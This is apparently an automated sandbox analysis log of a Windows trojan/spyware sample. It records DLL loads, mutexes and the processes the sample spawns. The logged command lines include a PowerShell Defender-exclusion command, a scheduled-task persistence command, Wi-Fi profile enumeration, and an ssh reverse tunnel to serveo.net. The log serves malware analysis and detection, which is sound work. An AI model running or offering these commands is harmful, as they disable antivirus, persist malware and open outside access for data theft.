                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
                  Source: vkefq4cv.oil.exe.0.dr, iYbhDf.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vkefq4cv.oil.exe.0.dr, iYbhDf.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: vkefq4cv.oil.exe.4.dr, iYbhDf.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vkefq4cv.oil.exe.4.dr, iYbhDf.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: jqOHOuPMJP.exe, BootstrapLoader.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: jqOHOuPMJP.exe, BootstrapLoader.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@66/19@3/6
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.logJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMutant created: \Sessions\1\BaseNamedObjects\jo0x2dte3z
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJump to behavior
                  Source: jqOHOuPMJP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: jqOHOuPMJP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD747C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: jqOHOuPMJP.exeReversingLabs: Detection: 13%
                  Source: jqOHOuPMJP.exeVirustotal: Detection: 24%
                  Source: unknownProcess created: C:\Users\user\Desktop\jqOHOuPMJP.exe C:\Users\user\Desktop\jqOHOuPMJP.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: jqOHOuPMJP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: jqOHOuPMJP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: jqOHOuPMJP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\system32\rsaenh.dll.pdb| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
                  Source: Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: jqOHOuPMJP.exeStatic PE information: 0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067EE438 pushad ; iretd 0_2_067EE445
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E648F push es; ret 0_2_067E6490
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E6592 push esp; ret 0_2_067E6599
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E7162 push eax; retf 0_2_067E7169
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F5632D push eax; ret 1_2_04F56341
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F53A9B push ebx; retf 1_2_04F53ADA
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
